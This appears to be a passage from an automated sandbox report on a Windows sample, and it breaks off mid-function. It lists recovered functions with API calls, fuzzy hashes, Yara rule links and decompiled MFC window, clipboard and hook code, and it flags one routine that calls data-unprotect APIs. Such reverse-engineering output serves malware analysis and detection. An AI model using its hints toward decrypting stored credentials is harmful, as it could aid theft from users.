                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3_InformationNameThrowUpperVolume__cftof_strlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 4239721014-0
                                                                                                                • Opcode ID: ed6d7f1c814fd9f069b2282b00ab8ae988dfbeaa5885fd4a024215384c0e3e0d
                                                                                                                • Instruction ID: 8cd8464d18cfd5c42ff7994ef19ca40f784e646f178cc94f9528bc758bb96a29
                                                                                                                • Opcode Fuzzy Hash: ed6d7f1c814fd9f069b2282b00ab8ae988dfbeaa5885fd4a024215384c0e3e0d
                                                                                                                • Instruction Fuzzy Hash: DA41B6B152055AEFEB25BF68CC88AFFB36CEF55315F000599E515E2280EB349A848A60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01261890, Relevance: 10.6, APIs: 7, Instructions: 83windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • IsIconic.USER32 ref: 012618AC
                                                                                                                • _memset.LIBCMT ref: 012618C3
                                                                                                                  • Part of subcall function 01268488: __EH_prolog3.LIBCMT ref: 0126848F
                                                                                                                  • Part of subcall function 01268488: BeginPaint.USER32(?,?,00000004,01267B72,?,00000058,01261963), ref: 012684BB
                                                                                                                • SendMessageA.USER32(?,00000027,?,00000000), ref: 012618E0
                                                                                                                • GetSystemMetrics.USER32 ref: 012618EE
                                                                                                                • GetSystemMetrics.USER32 ref: 012618F4
                                                                                                                • GetClientRect.USER32(?,?), ref: 01261909
                                                                                                                • DrawIcon.USER32 ref: 0126193B
                                                                                                                  • Part of subcall function 0126864F: __EH_prolog3.LIBCMT ref: 01268656
                                                                                                                  • Part of subcall function 0126864F: EndPaint.USER32(?,?,00000004,01267B98,?,?,00000058,01261963), ref: 01268671
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3MetricsPaintSystem$BeginClientDrawIconIconicMessageRectSend_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 2019494324-0
                                                                                                                • Opcode ID: feec404aea61a418465e3416d0aea22ac10d89044a91a8423dcc996b04bb905a
                                                                                                                • Instruction ID: abd2b7a0a444509e03e84d72f026be045c02b0ab6931993f8c08311e312cf14f
                                                                                                                • Opcode Fuzzy Hash: feec404aea61a418465e3416d0aea22ac10d89044a91a8423dcc996b04bb905a
                                                                                                                • Instruction Fuzzy Hash: B121C7726143019FDB10EF78EC49A6E7BE9FB88614F14062DFA89D7194DA61E844CB82
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10003535, Relevance: 10.6, APIs: 7, Instructions: 70encryptionCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CryptDataFreeLocalUnprotect__snprintf_s_free_malloc_memmove_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3728837580-0
                                                                                                                • Opcode ID: bb6a24024b9fcfef1f5360b956886ede52b1d6b569e4e2aceae5df97133803ed
                                                                                                                • Instruction ID: 804c4d7a8c692ba2e0a57576452063a84b1ebd20a8a858e3d695313d372baae9
                                                                                                                • Opcode Fuzzy Hash: bb6a24024b9fcfef1f5360b956886ede52b1d6b569e4e2aceae5df97133803ed
                                                                                                                • Instruction Fuzzy Hash: B9114876E045257BE760D6A89C49DAFBBAEEF81690F204126F944E3251EA309E0182F0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100960B8, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _wcscmp.LIBCMT ref: 100960CF
                                                                                                                • _wcscmp.LIBCMT ref: 100960E0
                                                                                                                • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,1009637E,?,00000000), ref: 100960FC
                                                                                                                • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,1009637E,?,00000000), ref: 10096126
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: InfoLocale_wcscmp
                                                                                                                • String ID: ACP$OCP
                                                                                                                • API String ID: 1351282208-711371036
                                                                                                                • Opcode ID: d1df2cd5837bd122a983d04e19b99d1b962a6eab61ea98cdd90984d1d7011f49
                                                                                                                • Instruction ID: abc42e157ce1c5c64c2ac0fc0efc859bcb0bfb211d06be924bbf2482de5dcb7e
                                                                                                                • Opcode Fuzzy Hash: d1df2cd5837bd122a983d04e19b99d1b962a6eab61ea98cdd90984d1d7011f49
                                                                                                                • Instruction Fuzzy Hash: 86015236205619AEEB00DF55DC55FCA37D8EF096A5F158015FA0CDA052F731EA81E790
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0126BF99, Relevance: 6.0, APIs: 4, Instructions: 41keyboardwindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0126F75B: GetWindowLongA.USER32 ref: 0126F769
                                                                                                                • GetKeyState.USER32 ref: 0126BFBD
                                                                                                                • GetKeyState.USER32 ref: 0126BFC6
                                                                                                                • GetKeyState.USER32 ref: 0126BFCF
                                                                                                                • SendMessageA.USER32(?,00000111,0000E146,00000000), ref: 0126BFE5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: State$LongMessageSendWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1063413437-0
                                                                                                                • Opcode ID: 60ed290312e368d0f28c39fafb083bb669b275c94a1b89a9df3f3aa483a3d383
                                                                                                                • Instruction ID: a8882e703702beb76a4c0ed448429c6d486fb240c59de9a19af315755e228297
                                                                                                                • Opcode Fuzzy Hash: 60ed290312e368d0f28c39fafb083bb669b275c94a1b89a9df3f3aa483a3d383
                                                                                                                • Instruction Fuzzy Hash: E3F0823A7E025F67EE252A7A9C09FB55E1C9F50B98F000435BB41EB1D9CDE2A4815A70
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 012611FD, Relevance: 42.0, APIs: 12, Strings: 12, Instructions: 45registryclipboardCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E012611FD(intOrPtr* __ecx) {
				intOrPtr* _t26;

				_t26 = __ecx;
				 *_t26 = RegisterClipboardFormatA("Native");
				 *((intOrPtr*)(_t26 + 4)) = RegisterClipboardFormatA("OwnerLink");
				 *((intOrPtr*)(_t26 + 8)) = RegisterClipboardFormatA("ObjectLink");
				 *((intOrPtr*)(_t26 + 0xc)) = RegisterClipboardFormatA("Embedded Object");
				 *((intOrPtr*)(_t26 + 0x10)) = RegisterClipboardFormatA("Embed Source");
				 *((intOrPtr*)(_t26 + 0x14)) = RegisterClipboardFormatA("Link Source");
				 *((intOrPtr*)(_t26 + 0x18)) = RegisterClipboardFormatA("Object Descriptor");
				 *((intOrPtr*)(_t26 + 0x1c)) = RegisterClipboardFormatA("Link Source Descriptor");
				 *((intOrPtr*)(_t26 + 0x20)) = RegisterClipboardFormatA("FileName");
				 *((intOrPtr*)(_t26 + 0x24)) = RegisterClipboardFormatA("FileNameW");
				 *((intOrPtr*)(_t26 + 0x28)) = RegisterClipboardFormatA("Rich Text Format");
				 *((intOrPtr*)(_t26 + 0x2c)) = RegisterClipboardFormatA("RichEdit Text and Objects");
				return _t26;
			}




                                                                                                                0x012819bb
                                                                                                                0x012819c4
                                                                                                                0x012819cd
                                                                                                                0x012819d7
                                                                                                                0x012819e1
                                                                                                                0x012819eb
                                                                                                                0x012819f5
                                                                                                                0x012819ff
                                                                                                                0x01281a09
                                                                                                                0x01281a13
                                                                                                                0x01281a1d
                                                                                                                0x01281a27
                                                                                                                0x01281a2c
                                                                                                                0x01281a33

                                                                                                                APIs
                                                                                                                • RegisterClipboardFormatA.USER32 ref: 012819BD
                                                                                                                • RegisterClipboardFormatA.USER32 ref: 012819C6
                                                                                                                • RegisterClipboardFormatA.USER32 ref: 012819D0
                                                                                                                • RegisterClipboardFormatA.USER32 ref: 012819DA
                                                                                                                • RegisterClipboardFormatA.USER32 ref: 012819E4
                                                                                                                • RegisterClipboardFormatA.USER32 ref: 012819EE
                                                                                                                • RegisterClipboardFormatA.USER32 ref: 012819F8
                                                                                                                • RegisterClipboardFormatA.USER32 ref: 01281A02
                                                                                                                • RegisterClipboardFormatA.USER32 ref: 01281A0C
                                                                                                                • RegisterClipboardFormatA.USER32 ref: 01281A16
                                                                                                                • RegisterClipboardFormatA.USER32 ref: 01281A20
                                                                                                                • RegisterClipboardFormatA.USER32 ref: 01281A2A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ClipboardFormatRegister
                                                                                                                • String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
                                                                                                                • API String ID: 1228543026-2889995556
                                                                                                                • Opcode ID: 14bfc544fe9b8208e6d08795539b886d9fa5266e4606e485b9f9e9d3ae88a1b7
                                                                                                                • Instruction ID: 5ec57ca91e0946b8e1f470fdcdcc45df33df5f2aacaa7bbc73cd547616c13678
                                                                                                                • Opcode Fuzzy Hash: 14bfc544fe9b8208e6d08795539b886d9fa5266e4606e485b9f9e9d3ae88a1b7
                                                                                                                • Instruction Fuzzy Hash: 470111B1EA17597BCF14AF7BAD0D80A7EA0FD45560354492FA018A7600EBB4E471CFD4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0126DAF6, Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 176COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 94%
                                                                                                                			E0126DAF6(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t51;
				int _t55;
				signed int _t60;
				void* _t62;
				signed int _t68;
				signed int _t70;
				long _t79;
				signed int _t81;
				intOrPtr _t82;
				int _t83;
				intOrPtr _t88;
				intOrPtr _t93;
				signed int _t97;
				char* _t105;
				void* _t107;
				void* _t109;
				int _t111;
				void* _t112;
				void* _t115;
				void* _t116;

				_t115 = __eflags;
				_t107 = __edx;
				_push(0x14c);
				E01285BAD(E012973EB, __ebx, __edi, __esi);
				_t92 =  *(_t112 + 0x10);
				_t111 =  *(_t112 + 0xc);
				_push(E01266D6E);
				 *(_t112 - 0x128) = _t92;
				_t109 = E01270689(_t92, 0x13881a4, __edi, _t111, _t115);
				_t116 = _t109;
				_t96 = 0 | _t116 == 0x00000000;
				if(_t116 == 0) {
					E01268275(_t96);
				}
				if( *(_t112 + 8) == 3) {
					_t51 =  *_t92;
					_t92 =  *(_t109 + 0x14);
					 *((intOrPtr*)(_t112 - 0x120)) = _t51;
					_t97 =  *(E012692A5(_t92, _t109, _t111, __eflags) + 0x14) & 0x000000ff;
					 *(_t112 - 0x124) = _t97;
					__eflags = _t92;
					if(_t92 != 0) {
						L7:
						__eflags =  *0x1389ec4;
						if( *0x1389ec4 == 0) {
							L12:
							__eflags = _t92;
							if(_t92 == 0) {
								__eflags =  *0x1389bcc;
								if( *0x1389bcc != 0) {
									L20:
									__eflags = (GetClassLongA(_t111, 0xffffffe0) & 0x0000ffff) -  *0x1389bcc; // 0x8000
									L21:
									if(__eflags == 0) {
										L26:
										_t55 = CallNextHookEx( *(_t109 + 0x28), 3, _t111,  *(_t112 - 0x128));
										__eflags =  *(_t112 - 0x124);
										_t111 = _t55;
										if( *(_t112 - 0x124) != 0) {
											UnhookWindowsHookEx( *(_t109 + 0x28));
											_t46 = _t109 + 0x28;
											 *_t46 =  *(_t109 + 0x28) & 0x00000000;
											__eflags =  *_t46;
										}
										goto L29;
									}
									L22:
									_t92 = GetWindowLongA(_t111, 0xfffffffc);
									__eflags = _t92;
									if(_t92 != 0) {
										_t60 = GetPropA(_t111, "AfxOldWndProc423");
										__eflags = _t60;
										if(_t60 == 0) {
											SetPropA(_t111, "AfxOldWndProc423", _t92);
											_t62 = GetPropA(_t111, "AfxOldWndProc423");
											__eflags = _t62 - _t92;
											if(_t62 == _t92) {
												GlobalAddAtomA("AfxOldWndProc423");
												SetWindowLongA(_t111, 0xfffffffc, E0126D98F);
											}
										}
									}
									goto L26;
								}
								_t93 = 0x30;
								E01283870(_t112 - 0x158, 0, _t93);
								 *((intOrPtr*)(_t112 - 0x158)) = _t93;
								_t92 = "#32768";
								_push(_t112 - 0x158);
								_push("#32768");
								_push(0);
								_t68 = E0126EF84("#32768", _t109, _t111, __eflags);
								 *0x1389bcc = _t68;
								__eflags = _t68;
								if(_t68 != 0) {
									goto L20;
								}
								_t70 = GetClassNameA(_t111, _t112 - 0x118, 0x100);
								__eflags = _t70;
								if(_t70 == 0) {
									goto L22;
								}
								 *((char*)(_t112 - 0x19)) = 0;
								__eflags = E012866F2(_t112 - 0x118, _t92);
								goto L21;
							}
							E01269011(_t112 - 0x119,  *((intOrPtr*)(_t92 + 0x1c)));
							 *(_t112 - 4) =  *(_t112 - 4) & 0x00000000;
							E0126AB5C(_t92, _t107, _t111);
							 *((intOrPtr*)( *_t92 + 0x50))();
							_t92 =  *((intOrPtr*)( *_t92 + 0xfc))();
							_t79 = SetWindowLongA(_t111, 0xfffffffc, 0x126a2bd);
							__eflags = _t79 - 0x126a2bd;
							if(_t79 != 0x126a2bd) {
								 *_t92 = _t79;
							}
							 *(_t109 + 0x14) =  *(_t109 + 0x14) & 0x00000000;
							 *(_t112 - 4) =  *(_t112 - 4) | 0xffffffff;
							E01269AE8(_t79);
							goto L26;
						}
						_t81 = GetClassLongA(_t111, 0xffffffe6);
						__eflags = _t81 & 0x00010000;
						if((_t81 & 0x00010000) != 0) {
							goto L26;
						}
						_t82 =  *((intOrPtr*)(_t112 - 0x120));
						_t105 =  *(_t82 + 0x28);
						__eflags = _t105 - 0xffff;
						if(_t105 <= 0xffff) {
							 *(_t112 - 0x18) = 0;
							GlobalGetAtomNameA( *(_t82 + 0x28) & 0x0000ffff, _t112 - 0x18, 5);
							_t105 = _t112 - 0x18;
						}
						_t83 = CompareStringA(0x7f, "true", _t105, 0xffffffff, "ime", 0xffffffff);
						__eflags = _t83 == 0;
						if(_t83 == 0) {
							goto L26;
						} else {
							goto L12;
						}
					}
					_t88 =  *((intOrPtr*)(_t112 - 0x120));
					__eflags =  *(_t88 + 0x20) & 0x40000000;
					if(( *(_t88 + 0x20) & 0x40000000) != 0) {
						goto L26;
					}
					__eflags = _t97;
					if(_t97 != 0) {
						goto L26;
					}
					goto L7;
				} else {
					CallNextHookEx( *(_t109 + 0x28),  *(_t112 + 8), _t111, _t92);
					L29:
					return E01285B5C(_t92, _t109, _t111);
				}
			}























                                                                                                                0x0126daf6
                                                                                                                0x0126daf6
                                                                                                                0x0126daf6
                                                                                                                0x0126db00
                                                                                                                0x0126db05
                                                                                                                0x0126db0d
                                                                                                                0x0126db10
                                                                                                                0x0126db15
                                                                                                                0x0126db22
                                                                                                                0x0126db24
                                                                                                                0x0126db26
                                                                                                                0x0126db2b
                                                                                                                0x0126db2d
                                                                                                                0x0126db2d
                                                                                                                0x0126db36
                                                                                                                0x0126db4b
                                                                                                                0x0126db4d
                                                                                                                0x0126db50
                                                                                                                0x0126db5b
                                                                                                                0x0126db5f
                                                                                                                0x0126db65
                                                                                                                0x0126db67
                                                                                                                0x0126db84
                                                                                                                0x0126db84
                                                                                                                0x0126db8b
                                                                                                                0x0126dbe6
                                                                                                                0x0126dbe6
                                                                                                                0x0126dbe8
                                                                                                                0x0126dc46
                                                                                                                0x0126dc4e
                                                                                                                0x0126dcb8
                                                                                                                0x0126dcc4
                                                                                                                0x0126dccb
                                                                                                                0x0126dccb
                                                                                                                0x0126dd22
                                                                                                                0x0126dd2e
                                                                                                                0x0126dd34
                                                                                                                0x0126dd3b
                                                                                                                0x0126dd3d
                                                                                                                0x0126dd42
                                                                                                                0x0126dd48
                                                                                                                0x0126dd48
                                                                                                                0x0126dd48
                                                                                                                0x0126dd48
                                                                                                                0x00000000
                                                                                                                0x0126dd4c
                                                                                                                0x0126dccd
                                                                                                                0x0126dcd6
                                                                                                                0x0126dcd8
                                                                                                                0x0126dcda
                                                                                                                0x0126dce2
                                                                                                                0x0126dce8
                                                                                                                0x0126dcea
                                                                                                                0x0126dcf3
                                                                                                                0x0126dcff
                                                                                                                0x0126dd05
                                                                                                                0x0126dd07
                                                                                                                0x0126dd0e
                                                                                                                0x0126dd1c
                                                                                                                0x0126dd1c
                                                                                                                0x0126dd07
                                                                                                                0x0126dcea
                                                                                                                0x00000000
                                                                                                                0x0126dcda
                                                                                                                0x0126dc52
                                                                                                                0x0126dc5d
                                                                                                                0x0126dc65
                                                                                                                0x0126dc71
                                                                                                                0x0126dc76
                                                                                                                0x0126dc77
                                                                                                                0x0126dc78
                                                                                                                0x0126dc7a
                                                                                                                0x0126dc7f
                                                                                                                0x0126dc85
                                                                                                                0x0126dc88
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0126dc97
                                                                                                                0x0126dc9d
                                                                                                                0x0126dc9f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0126dca7
                                                                                                                0x0126dcb4
                                                                                                                0x00000000
                                                                                                                0x0126dcb4
                                                                                                                0x0126dbf3
                                                                                                                0x0126dbf8
                                                                                                                0x0126dbff
                                                                                                                0x0126dc08
                                                                                                                0x0126dc1d
                                                                                                                0x0126dc1f
                                                                                                                0x0126dc25
                                                                                                                0x0126dc2a
                                                                                                                0x0126dc2c
                                                                                                                0x0126dc2c
                                                                                                                0x0126dc2e
                                                                                                                0x0126dc38
                                                                                                                0x0126dc3c
                                                                                                                0x00000000
                                                                                                                0x0126dc3c
                                                                                                                0x0126db90
                                                                                                                0x0126db96
                                                                                                                0x0126db9b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0126dba1
                                                                                                                0x0126dba7
                                                                                                                0x0126dbaa
                                                                                                                0x0126dbb0
                                                                                                                0x0126dbbd
                                                                                                                0x0126dbc1
                                                                                                                0x0126dbc7
                                                                                                                0x0126dbc7
                                                                                                                0x0126dbd8
                                                                                                                0x0126dbdf
                                                                                                                0x0126dbe0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0126dbe0
                                                                                                                0x0126db69
                                                                                                                0x0126db6f
                                                                                                                0x0126db76
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0126db7c
                                                                                                                0x0126db7e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0126db38
                                                                                                                0x0126db40
                                                                                                                0x0126dd4e
                                                                                                                0x0126dd53
                                                                                                                0x0126dd53

                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 0126DB00
                                                                                                                  • Part of subcall function 01270689: __EH_prolog3.LIBCMT ref: 01270690
                                                                                                                • CallNextHookEx.USER32(?,?,?,?), ref: 0126DB40
                                                                                                                  • Part of subcall function 01268275: __CxxThrowException@8.LIBCMT ref: 01268289
                                                                                                                • GetClassLongA.USER32 ref: 0126DB90
                                                                                                                • GlobalGetAtomNameA.KERNEL32(?,?,00000005), ref: 0126DBC1
                                                                                                                • CompareStringA.KERNEL32(0000007F,?,?,000000FF,ime,000000FF), ref: 0126DBD8
                                                                                                                • SetWindowLongA.USER32 ref: 0126DC1F
                                                                                                                • _memset.LIBCMT ref: 0126DC5D
                                                                                                                  • Part of subcall function 0126EF84: GetClassInfoExA.USER32 ref: 0126EFBB
                                                                                                                • GetClassNameA.USER32(?,?,00000100), ref: 0126DC97
                                                                                                                  • Part of subcall function 012866F2: __mbscmp_l.LIBCMT ref: 012866FD
                                                                                                                • GetClassLongA.USER32 ref: 0126DCBB
                                                                                                                • GetWindowLongA.USER32 ref: 0126DCD0
                                                                                                                • GetPropA.USER32 ref: 0126DCE2
                                                                                                                • SetPropA.USER32 ref: 0126DCF3
                                                                                                                • GetPropA.USER32 ref: 0126DCFF
                                                                                                                • GlobalAddAtomA.KERNEL32 ref: 0126DD0E
                                                                                                                • SetWindowLongA.USER32 ref: 0126DD1C
                                                                                                                • CallNextHookEx.USER32(?,00000003,?,?), ref: 0126DD2E
                                                                                                                • UnhookWindowsHookEx.USER32(?), ref: 0126DD42
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Long$Class$HookPropWindow$AtomCallGlobalNameNext$CompareException@8H_prolog3H_prolog3_InfoStringThrowUnhookWindows__mbscmp_l_memset
                                                                                                                • String ID: #32768$AfxOldWndProc423$ime
                                                                                                                • API String ID: 4085428861-4034971020
                                                                                                                • Opcode ID: a2bc92220946e4d498d9ea1e64ae0e77e0fcfce60e861e30f77d9da1f19f901b
                                                                                                                • Instruction ID: 0d6dcf927c0afb9d3342773e4ebcd8180598a539e1f4999d496df3252074fd67
                                                                                                                • Opcode Fuzzy Hash: a2bc92220946e4d498d9ea1e64ae0e77e0fcfce60e861e30f77d9da1f19f901b
                                                                                                                • Instruction Fuzzy Hash: 1951803162022EABDF25AF98DC89FEE3B7CAF19329F000158F645961D5DB7099C0CB54
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0126AC1C, Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 190windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 78%
                                                                                                                			E0126AC1C(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				struct tagRECT _v56;
				struct tagRECT _v76;
				char _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t74;
				struct tagMONITORINFO* _t77;
				struct HMONITOR__* _t108;
				struct HMONITOR__* _t113;
				signed int _t121;
				struct tagMONITORINFO* _t122;
				intOrPtr _t123;
				struct tagMONITORINFO* _t124;
				long _t127;
				void* _t136;
				signed int _t137;
				struct HWND__* _t138;
				intOrPtr _t141;
				intOrPtr _t144;
				void* _t147;
				signed int _t149;

				_t136 = __edx;
				_t74 =  *0x12aa3f0; // 0xddd5d539
				_v8 = _t74 ^ _t149;
				_t123 = _a4;
				_t144 = __ecx;
				_v104 = __ecx;
				_t137 = E0126F75B(__ecx);
				if(_t123 == 0) {
					if((_t137 & 0x40000000) == 0) {
						_t77 = GetWindow( *(__ecx + 0x20), 4);
					} else {
						_t77 = GetParent( *(__ecx + 0x20));
					}
					_t124 = _t77;
					if(_t124 != 0) {
						_t122 = SendMessageA(_t124, 0x36b, 0, 0);
						if(_t122 != 0) {
							_t124 = _t122;
						}
					}
				} else {
					_t124 =  *(_t123 + 0x20);
				}
				_v40.left = _v40.left & 0x00000000;
				_v40.top = _v40.top & 0x00000000;
				_v40.right = _v40.right & 0x00000000;
				_v40.bottom = _v40.bottom & 0x00000000;
				GetWindowRect( *(_t144 + 0x20),  &_v40);
				_v24.left = 0;
				_v24.top = 0;
				_v24.right = 0;
				_v24.bottom = 0;
				_v56.left = 0;
				_v56.top = 0;
				_v56.right = 0;
				_v56.bottom = 0;
				if((_t137 & 0x40000000) != 0) {
					_t138 = GetParent( *(_t144 + 0x20));
					GetClientRect(_t138,  &_v24);
					GetClientRect(_t124,  &_v56);
					MapWindowPoints(_t124, _t138,  &_v56, 2);
				} else {
					if(_t124 != 0) {
						_t121 = GetWindowLongA(_t124, 0xfffffff0);
						if((_t121 & 0x10000000) == 0 || (_t121 & 0x20000000) != 0) {
							_t124 = 0;
						}
					}
					_v96 = 0x28;
					if(_t124 != 0) {
						GetWindowRect(_t124,  &_v56);
						_t108 =  &_v96;
						__imp__MonitorFromWindow(2, _t108);
						GetMonitorInfoA(_t108, _t124);
						CopyRect( &_v24,  &_v76);
					} else {
						_t113 = E01263918();
						if(_t113 != 0) {
							_t113 =  *(_t113 + 0x20);
						}
						__imp__MonitorFromWindow("true",  &_v96);
						GetMonitorInfoA(_t113, _t113);
						CopyRect( &_v56,  &_v76);
						CopyRect( &_v24,  &_v76);
					}
				}
				_t147 = _v40.right - _v40.left;
				asm("cdq");
				asm("cdq");
				_t127 = (_v56.right + _v56.left - _t136 >> 1) - (_t147 - _t136 >> 1);
				_v100 = _v40.bottom - _v40.top;
				asm("cdq");
				asm("cdq");
				_t141 = (_v56.bottom + _v56.top - _t136 >> 1) - (_v100 - _t136 >> 1);
				if(_t147 + _t127 > _v24.right) {
					_t127 = _v40.left - _v40.right + _v24.right;
				}
				if(_t127 < _v24.left) {
					_t127 = _v24.left;
				}
				if(_v100 + _t141 > _v24.bottom) {
					_t141 = _v40.top - _v40.bottom + _v24.bottom;
				}
				if(_t141 < _v24.top) {
